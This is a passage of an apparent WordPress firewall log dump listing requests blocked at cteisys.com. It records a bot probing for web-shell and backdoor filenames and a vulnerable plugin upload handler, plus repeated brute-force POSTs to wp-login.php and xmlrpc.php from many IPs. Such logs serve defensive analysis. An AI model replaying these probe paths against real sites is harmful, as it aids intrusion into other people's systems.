Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','EQjVxnJtNKkUo4OwDyAesFCf',0,1663864033.1602,347,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','ElNqmAF3Jsyuh6trjMPo2gY8',0,1663864037.6558,335,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','B09EWst1LFcgPiJnmMkZHlKz',0,1663864041.7852,310,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','QA4SKeBE1wPi20jJMpDzkd7b',0,1663864045.5580,313,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-admin/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Zi8pL37BeGuN1KXjAqct5aln',0,1663864048.4050,286,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-content/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','lsXZLTHz1afeUcPdhyD6EwVk',0,1663864050.4626,296,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-includes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','UFmSucRfBwqsotCQ4GPlEOeV',0,1663864054.7547,286,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-content/themes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','tKIXhTzQJZSBu6qGYblsNmMe',0,1663864059.0037,272,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-content/plugins/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','GaUD7W6EMleF4yJ3CokPimYS',0,1663864064.9098,312,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','https://cteisys.com/wp-includes/css/wp-config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','kHAo7KwEgjfFz92NIQYmLZ15',0,1663864068.6635,293,'','POST',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-content/plugins/ubh/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Br7VemMNjscvOqKkaAlfPZSC',0,1663864074.2486,378,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-includes/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','NBjQlwOtT0cvDJRb85msi9go',0,1663864085.3236,386,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-content/plugins/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','LhDtqG3oHIaO6dbSX01yjMUY',0,1663864087.1985,337,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/haders.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','vdS840jPu1BQ3HWwxf7pDRlK',0,1663864096.6060,320,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-content/wp-old-index.php?action=login&pass=-1&submit=','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','9guv3WkHoIshn2tzKErx0Xm7',0,1663864098.3970,281,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/legion.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','GHrBWCY9U3bwPxQStEsAZ0dM',0,1663864099.4262,287,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-content/mu-plugins/db-safe-mode.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','EcnkrloPKzGdSDfA728MYOQH',0,1663864107.0224,430,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-includes/lfx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','UCaOBg6R9S7qzAwYlmQcHr1K',0,1663864110.0744,388,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-includes/small.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','cYk4tXFET0hGjONHfdQB89VI',0,1663864115.8509,315,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','dRG7qCKvcxJjhUN052LFZu41',0,1663864121.0863,300,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','fM5RzhymX8dOKwZCr7exnbYs',0,1663864123.4361,315,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','ct6JUyNKgDHGRfBXh32OZsIj',0,1663864126.0717,324,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/test.php?Ghost=send','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','9OMSaofi1u3zqWXZFEKr2ltk',0,1663864128.7602,352,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-content/langar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','QzM72Aakc6hs5G4dfBOo1l8F',0,1663864129.9613,308,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Jwq8f46Wv2t5iloM3RdbL9FT',0,1663864134.1953,294,'','GET',403,0,700,0,1,'',0),('75.119.157.181',1266130357,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','2OINtBmH9ksWcF5K3ChDxjQS',0,1663864228.7059,1359,'','POST',403,0,600,0,1,'',0),('165.22.109.42',2769710378,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','wUs5CZX4F1GEmclobDQvAYfx',0,1663864271.5876,1209,'','POST',403,0,600,0,1,'',0),('45.137.66.199',763970247,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','vdQUYWKFCHk6ftibVyJoRzIM',0,1663865300.2128,488,'','POST',403,0,600,0,1,'',0),('45.137.66.199',763970247,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','H2eLGOgCJvIQU7xdmc0t63za',0,1663865301.6888,511,'','POST',403,0,600,0,1,'',0),('93.125.114.121',1568502393,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','B2IFNwq6VPgHtU8zL1kOSJju',0,1663865342.9823,457,'','POST',403,0,600,0,1,'',0),('93.125.114.121',1568502393,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','ruiCGY930qH7Lwz1mZK5h2Pg',0,1663865346.7105,491,'','POST',403,0,600,0,1,'',0),('202.21.38.119',3390383735,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/77.0.3865.90 Safari\\/537.36\"}','rAO7TKNfVGPXnhq2MslJS1F9',0,1663865672.1186,1242,'','POST',403,0,600,0,1,'',0),('69.163.224.107',1168367723,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','3kTVvEmoDHIC80faeY42hrSP',0,1663865715.0904,1278,'','POST',403,0,600,0,1,'',0),('171.244.0.91',2884894811,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.116 Safari\\/537.36\"}','kIsauFzJdtbrCK932M5UpT4R',0,1663867099.7353,18455,'','POST',403,0,600,0,1,'',0),('167.172.168.111',2813110383,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','PZDmib3NvsWtYBKLdnA9fHz7',0,1663867140.6163,1514,'','POST',403,0,600,0,1,'',0),('62.102.148.156',1046910108,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','49ntaeMsC8iSRgVKrPzYN1Uu',0,1663868046.1736,2972,'','POST',403,0,515,0,1,'',0),('139.59.82.122',2335920762,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.101 Safari\\/537.36\"}','liLPMHB0rne9hKuFWASRQamZ',0,1663868518.7911,1583,'','POST',403,0,600,0,1,'',0),('46.101.150.34',778409506,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','vgeGwa75fbiJlT9mE8XMAq0I',0,1663868562.5136,528,'','POST',403,0,600,0,1,'',0),('23.148.145.50',395612466,'','http://cteisys.com/wp-includes/wp-class.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','9rRgp6wjQFdzCAqGJ31VbZH5',0,1663869599.3442,11862,'','GET',403,0,700,0,1,'',0),('23.148.145.50',395612466,'','https://cteisys.com/wp-includes/wp-class.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','nKv2WrZQRibjgE8t0zc3wUMY',0,1663869623.7135,515,'','GET',403,0,700,0,1,'',0),('141.94.247.170',2371811242,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.75 Safari\\/537.36\"}','3oZwXQgCjbzGivxt5qFnsJar',0,1663869925.1305,6404,'','POST',403,0,600,0,1,'',0),('142.93.41.19',2388470035,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','uzoSircdGUwleyn6R2EYOq45',0,1663869973.1781,1274,'','POST',403,0,600,0,1,'',0),('51.15.183.168',856668072,'','http://cteisys.com/includes/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/75.0.3770.100 Safari\\/537.36\"}','r4BIbujFQnapGyh5SOdN0Hog',0,1663869994.4735,331,'','GET',403,0,700,0,1,'',0),('46.101.202.174',778422958,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','NPc8HDOzt57GlJFevVR2YEwg',0,1663870157.8566,612,'','POST',403,0,600,0,1,'',0),('46.101.202.174',778422958,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','TM0yUpoPtwJqdvsWI5bukclC',0,1663870159.2249,538,'','POST',403,0,600,0,1,'',0),('51.89.47.206',861482958,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.86 Safari\\/537.36\"}','WY3g2yxdFQKthwVRaAqJ1MzT',0,1663871314.2470,1372,'','POST',403,0,600,0,1,'',0),('207.154.248.39',3483039783,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','qWAO1ekScD0Xu95x42UrZlE3',0,1663871355.2166,1256,'','POST',403,0,600,0,1,'',0),('185.156.175.35',3114053411,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','MpSuYAFrn1jgZtNbyodlkJq4',0,1663872666.0919,2624,'','POST',403,0,515,0,1,'',0),('23.99.229.218',392422874,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.116 Safari\\/537.36\"}','ISkoXYdJviKmyFZgcEaxDUeH',0,1663872670.9085,448,'','POST',403,0,600,0,1,'',0),('167.172.168.111',2813110383,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36 MVisionPlayer\\/1.0.0.0\"}','AJLU4KM5n8Cz0gByfotZmD6k',0,1663872709.5556,1261,'','POST',403,0,600,0,1,'',0),('145.239.30.120',2448367224,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','Qml96iH1RwjxayctfvJYsFbS',0,1663874034.6222,1116,'','POST',403,0,600,0,1,'',0),('143.244.177.220',2415178204,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36\"}','AXdDZi0KYy8fFhc5UIsGSjbg',0,1663874074.2418,477,'','POST',403,0,600,0,1,'',0),('217.21.87.243',3642054643,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','NSkFEpg4Kz95YXbivrHyo68C',0,1663875395.1500,1927,'','POST',403,0,600,0,1,'',0),('207.154.250.8',3483040264,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.84 Safari\\/537.36\"}','RZbWSkCJaX4jOczDLAwU6ye9',0,1663875435.4162,1214,'','POST',403,0,600,0,1,'',0),('23.88.110.165',391671461,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','hCQNormlaAJ19jgckOyBGfvT',0,1663875445.0090,471,'','POST',403,0,600,0,1,'',0),('23.88.110.165',391671461,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','0vKAETtnxM4PgbySkGrVWUsC',0,1663875446.7522,528,'','POST',403,0,600,0,1,'',0),('192.249.115.227',3237573603,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','EhTWvjCOtoS9RYXK3xza7GnD',0,1663875840.9180,458,'','POST',403,0,600,0,1,'',0),('192.249.115.227',3237573603,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','rzsIbX4g0f82UFwx9JQNCD6K',0,1663875841.6436,527,'','POST',403,0,600,0,1,'',0),('188.127.239.132',3162500996,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','f9ChBbR6xOw1tTdsmKnZ3UV2',0,1663876097.1544,489,'','POST',403,0,600,0,1,'',0),('188.127.239.132',3162500996,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','G92kQj6KXzIZerbTsqgMCABi',0,1663876098.9548,468,'','POST',403,0,600,0,1,'',0),('167.71.117.225',2806478305,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','ysA0dScaRgvXDm5p1lfCLbuq',0,1663876764.4242,1288,'','POST',403,0,600,0,1,'',0),('148.72.207.163',2487799715,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.193 Safari\\/537.36\"}','xUd1vtqYVWK0ykBzmhNOw6u7',0,1663876805.7852,1706,'','POST',403,0,600,0,1,'',0),('51.38.192.91',858177627,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','diFQjzSE2OJLDAfPlwXstgGu',0,1663878173.0104,10962,'','POST',403,0,600,0,1,'',0),('167.71.141.164',2806484388,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/59.0.3071.115 Safari\\/537.36\"}','gPweJV0nSAjimzFaIGZRELWl',0,1663878214.0829,768,'','POST',403,0,600,0,1,'',0),('188.127.239.132',3162500996,'','https://cteisys.com/wp-login.php?redirect_to=https3a2f2fcteisys.com2fwp-admin2f&reauth=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https3a2f2fcteisys.com2fwp-admin2f&reauth=1?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','LnD4XuOyZrijRm0bHl9tY7JA',0,1663878215.9680,499,'','POST',403,0,600,0,1,'',0),('188.127.239.132',3162500996,'','https://cteisys.com/wp-login.php?redirect_to=https3a2f2fcteisys.com2fwp-admin2f&reauth=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https3a2f2fcteisys.com2fwp-admin2f&reauth=1?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','QVM1qwKLX6tH87SYPJlOua4U',0,1663878217.8416,483,'','POST',403,0,600,0,1,'',0),('181.174.125.214',3048111574,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','rnNyW0OD3hoZ4faBFuCpxvGS',0,1663879574.0330,2399,'','POST',403,0,600,0,1,'',0),('34.65.234.0',574745088,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','oEMrOc4TApYB05gV2HI7wzmk',0,1663879609.2388,1246,'','POST',403,0,600,0,1,'',0),('67.222.152.219',1138661595,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','sUDVCcxd8FYlN64wShekpZEH',0,1663880323.3503,19318,'','POST',403,0,515,0,1,'',0),('209.145.54.196',3515954884,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','N1Pn3MOQSZHY5hsqKTEpJIR6',0,1663880823.1705,1379,'','POST',403,0,515,0,1,'',0),('51.91.220.143',861658255,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','7p8ifx9udGtJSVaQFEZh1sM4',0,1663881006.1665,1547,'','POST',403,0,600,0,1,'',0),('93.114.235.167',1567812519,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','LS78EkFwcy6GZmAXoIuCtJOr',0,1663881336.1664,1363,'','POST',403,0,515,0,1,'',0),('167.71.117.225',2806478305,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','KOBm1axH7Nku6ogVpCSQRqPZ',0,1663882373.2785,12594,'','POST',403,0,600,0,1,'',0),('178.62.110.145',2990435985,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','79KMqcC6YP4bpSlA81twaJBT',0,1663882368.0358,18578,'','POST',403,0,515,0,1,'',0),('185.197.195.173',3116745645,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Z3xbwkjavhT5cAPUMWGLOD1K',0,1663882901.6336,1231,'','POST',403,0,515,0,1,'',0),('192.169.177.64',3232346432,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 